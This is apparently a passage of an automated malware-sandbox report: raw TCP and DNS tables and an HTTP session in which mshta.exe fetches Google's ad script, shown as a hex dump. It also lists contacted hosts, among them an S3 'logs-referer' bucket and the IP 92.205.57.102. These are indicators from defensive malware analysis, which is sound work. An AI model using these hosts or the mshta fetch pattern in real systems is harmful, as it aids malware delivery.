                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.541560888 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.548887014 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.549098969 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.549115896 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.549273014 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.555913925 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.556147099 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.556164026 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.556351900 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.562984943 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.563256025 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.563273907 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.563586950 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.569834948 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.570049047 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.570066929 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.570297956 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.576759100 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.576819897 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.576950073 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.576950073 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.576993942 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.576993942 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.577009916 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.577157974 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.044476032 CET4434976092.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.044652939 CET49760443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.044827938 CET49760443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.076132059 CET49760443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.076149940 CET4434976092.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.076481104 CET4434976092.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.077649117 CET49760443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.078552961 CET49760443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.122212887 CET4434976092.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.187812090 CET443497573.5.232.230192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.187980890 CET443497573.5.232.230192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.188009977 CET49757443192.168.11.203.5.232.230
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.188124895 CET49757443192.168.11.203.5.232.230
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.188662052 CET49757443192.168.11.203.5.232.230
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.188677073 CET443497573.5.232.230192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.194849014 CET4434975852.95.165.10192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.194883108 CET4434975852.95.165.10192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.195095062 CET49758443192.168.11.2052.95.165.10
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.195095062 CET49758443192.168.11.2052.95.165.10
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.195113897 CET49758443192.168.11.2052.95.165.10
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.655680895 CET4434976092.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.655802011 CET4434976092.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.655831099 CET49760443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.655941010 CET49760443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.691431046 CET49760443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.691483021 CET4434976092.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.692380905 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.692435026 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.692572117 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.692852020 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:57.692878008 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:58.333642006 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:58.333899021 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:58.334172964 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:58.334178925 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:58.334357977 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:58.334363937 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:58.975174904 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:58.975318909 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:58.975346088 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:58.975527048 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294250011 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294267893 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294379950 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294420958 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294467926 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294467926 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294492960 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294509888 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294572115 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294668913 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294668913 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294671059 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294698954 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294862986 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294909000 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.294924974 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.295097113 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.295239925 CET49762443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:59.295264959 CET4434976292.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:49:01.931991100 CET49763443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:49:01.932012081 CET44349763142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:49:01.932224989 CET49763443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:49:01.932406902 CET49763443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:49:01.932411909 CET44349763142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:49:02.059752941 CET49763443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.223993063 CET5543953192.168.11.201.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.225259066 CET4934053192.168.11.201.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.227533102 CET6553353192.168.11.201.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.263812065 CET6436853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.388416052 CET53554391.1.1.1192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.579493999 CET5191053192.168.11.201.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.581995010 CET5407053192.168.11.201.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773032904 CET53540701.1.1.1192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773228884 CET53519101.1.1.1192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.222686052 CET5527853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.399041891 CET53552781.1.1.1192.168.11.20
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.223993063 CET192.168.11.201.1.1.10xbc6eStandard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.225259066 CET192.168.11.201.1.1.10xe466Standard query (0)www.americanas.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.227533102 CET192.168.11.201.1.1.10xdea6Standard query (0)images-americanas.b2w.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.263812065 CET192.168.11.201.1.1.10x7547Standard query (0)statics-americanas.b2w.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.579493999 CET192.168.11.201.1.1.10xd0Standard query (0)logs-referer.s3-sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.581995010 CET192.168.11.201.1.1.10x3ae2Standard query (0)s3-sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.222686052 CET192.168.11.201.1.1.10xb3a1Standard query (0)102.57.205.92.host.secureserver.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.388416052 CET1.1.1.1192.168.11.200xbc6eNo error (0)securepubads.g.doubleclick.net142.250.189.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.452337980 CET1.1.1.1192.168.11.200xdea6No error (0)images-americanas.b2w.iosni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.522701025 CET1.1.1.1192.168.11.200x7547No error (0)statics-americanas.b2w.iosni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.574290991 CET1.1.1.1192.168.11.200xe466No error (0)www.americanas.com.brsni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773032904 CET1.1.1.1192.168.11.200x3ae2No error (0)s3-sa-east-1.amazonaws.com52.95.165.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773032904 CET1.1.1.1192.168.11.200x3ae2No error (0)s3-sa-east-1.amazonaws.com52.95.163.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773032904 CET1.1.1.1192.168.11.200x3ae2No error (0)s3-sa-east-1.amazonaws.com16.12.0.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773032904 CET1.1.1.1192.168.11.200x3ae2No error (0)s3-sa-east-1.amazonaws.com3.5.232.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773032904 CET1.1.1.1192.168.11.200x3ae2No error (0)s3-sa-east-1.amazonaws.com16.12.0.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773032904 CET1.1.1.1192.168.11.200x3ae2No error (0)s3-sa-east-1.amazonaws.com3.5.234.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773032904 CET1.1.1.1192.168.11.200x3ae2No error (0)s3-sa-east-1.amazonaws.com16.12.2.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773032904 CET1.1.1.1192.168.11.200x3ae2No error (0)s3-sa-east-1.amazonaws.com16.12.2.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773228884 CET1.1.1.1192.168.11.200xd0No error (0)logs-referer.s3-sa-east-1.amazonaws.coms3-r-w.sa-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773228884 CET1.1.1.1192.168.11.200xd0No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773228884 CET1.1.1.1192.168.11.200xd0No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773228884 CET1.1.1.1192.168.11.200xd0No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.2.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773228884 CET1.1.1.1192.168.11.200xd0No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.233.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773228884 CET1.1.1.1192.168.11.200xd0No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773228884 CET1.1.1.1192.168.11.200xd0No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.234.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773228884 CET1.1.1.1192.168.11.200xd0No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.773228884 CET1.1.1.1192.168.11.200xd0No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.399041891 CET1.1.1.1192.168.11.200xb3a1No error (0)102.57.205.92.host.secureserver.net92.205.57.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              • securepubads.g.doubleclick.net
                                                                                                                                                                                                                              • s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                              • logs-referer.s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                              • 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.11.2049751142.250.189.2264436236C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-23 09:48:55 UTC348OUTGET /tag/js/gpt.js HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Language: en-US,en-GB;q=0.7,en;q=0.3
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                              Host: securepubads.g.doubleclick.net
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC787INHTTP/1.1 200 OK
                                                                                                                                                                                                                              P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 09:48:55 GMT
                                                                                                                                                                                                                              Expires: Mon, 23 Dec 2024 09:48:55 GMT
                                                                                                                                                                                                                              Cache-Control: private, max-age=900, stale-while-revalidate=3600
                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                              ETag: 227 / 20080 / m202412090101 / config-hash: 16775640167977932469
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                                                              Content-Length: 105873
                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC468INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 73 74 74 63 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 29 7b 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 28 29 3b 7d 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 5f 6c 6f 61 64 65 64 5f 29 72 65 74 75 72 6e 3b 76 61 72 20 6e 2c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 2c 62 61 3d 74 79 70 65
                                                                                                                                                                                                                              Data Ascii: (function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=type
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC1255INData Raw: 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 3b 7d 2c 64 61 3d 63 61 28 74 68 69 73 29 2c 65 61 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 53 79 6d
                                                                                                                                                                                                                              Data Ascii: object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Sym
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC1255INData Raw: 61 79 20 49 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 20 49 6e 74 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 36 34 41 72 72 61 79 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 63 3d 30 3b 63 3c 62 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 64 61 5b 62 5b 63 5d 5d 3b 74 79 70 65 6f 66 20 64 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 64 2e 70 72 6f 74 6f 74 79 70 65 5b 61 5d 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 62 61 28 64 2e 70 72 6f 74 6f 74 79 70 65 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72
                                                                                                                                                                                                                              Data Ascii: ay Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Array".split(" "),c=0;c<b.length;c++){var d=da[b[c]];typeof d==="function"&&typeof d.prototype[a]!="function"&&ba(d.prototype,a,{configurable:!0,wr
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC1255INData Raw: 2b 22 20 69 73 20 6e 6f 74 20 61 6e 20 69 74 65 72 61 62 6c 65 20 6f 72 20 41 72 72 61 79 4c 69 6b 65 22 29 3b 7d 2c 41 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 29 7b 61 3d 7a 28 61 29 3b 66 6f 72 28 76 61 72 20 62 2c 63 3d 5b 5d 3b 21 28 62 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 63 2e 70 75 73 68 28 62 2e 76 61 6c 75 65 29 3b 61 3d 63 7d 72 65 74 75 72 6e 20 61 7d 2c 70 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6f 61 28 61 2c 61 29 7d 2c 6f 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 72 61 77 3d 62 3b 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 26 26 28 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 61 29 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 62
                                                                                                                                                                                                                              Data Ascii: +" is not an iterable or ArrayLike");},A=function(a){if(!(a instanceof Array)){a=z(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a},pa=function(a){return oa(a,a)},oa=function(a,b){a.raw=b;Object.freeze&&(Object.freeze(a),Object.freeze(b
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC1255INData Raw: 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2c 65 3d 30 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 68 69 73 2e 67 3d 28 65 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 67 29 7b 67 3d 7a 28 67 29 3b 66 6f 72 28 76 61 72 20 68 3b 21 28 68 3d 67 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 68 3d 68 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 68 5b 30 5d 2c 68 5b 31 5d 29 7d 7d 3b 66 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 69 66 28 21 63 28 67 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 57 65 61 6b 4d 61 70 20 6b 65 79 22 29 3b 69 66 28 21 71 61 28 67 2c 64 29 29 7b 76 61 72 20 6b 3d 6e 65 77 20 62 3b 62 61 28 67 2c 64 2c 7b 76 61 6c
                                                                                                                                                                                                                              Data Ascii: ath.random(),e=0,f=function(g){this.g=(e+=Math.random()+1).toString();if(g){g=z(g);for(var h;!(h=g.next()).done;)h=h.value,this.set(h[0],h[1])}};f.prototype.set=function(g,h){if(!c(g))throw Error("Invalid WeakMap key");if(!qa(g,d)){var k=new b;ba(g,d,{val
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC1255INData Raw: 2e 6c 69 73 74 7c 7c 28 6c 2e 6c 69 73 74 3d 74 68 69 73 5b 30 5d 5b 6c 2e 69 64 5d 3d 5b 5d 29 3b 6c 2e 75 3f 6c 2e 75 2e 76 61 6c 75 65 3d 6b 3a 28 6c 2e 75 3d 7b 6e 65 78 74 3a 74 68 69 73 5b 31 5d 2c 48 3a 74 68 69 73 5b 31 5d 2e 48 2c 68 65 61 64 3a 74 68 69 73 5b 31 5d 2c 6b 65 79 3a 68 2c 76 61 6c 75 65 3a 6b 7d 2c 6c 2e 6c 69 73 74 2e 70 75 73 68 28 6c 2e 75 29 2c 74 68 69 73 5b 31 5d 2e 48 2e 6e 65 78 74 3d 6c 2e 75 2c 74 68 69 73 5b 31 5d 2e 48 3d 6c 2e 75 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 68 3d 64 28 74 68 69 73 2c 68 29 3b 72 65 74 75 72 6e 20 68 2e 75 26 26 68 2e 6c 69 73 74 3f 28 68 2e 6c 69 73 74 2e 73
                                                                                                                                                                                                                              Data Ascii: .list||(l.list=this[0][l.id]=[]);l.u?l.u.value=k:(l.u={next:this[1],H:this[1].H,head:this[1],key:h,value:k},l.list.push(l.u),this[1].H.next=l.u,this[1].H=l.u,this.size++);return this};c.prototype.delete=function(h){h=d(this,h);return h.u&&h.list?(h.list.s
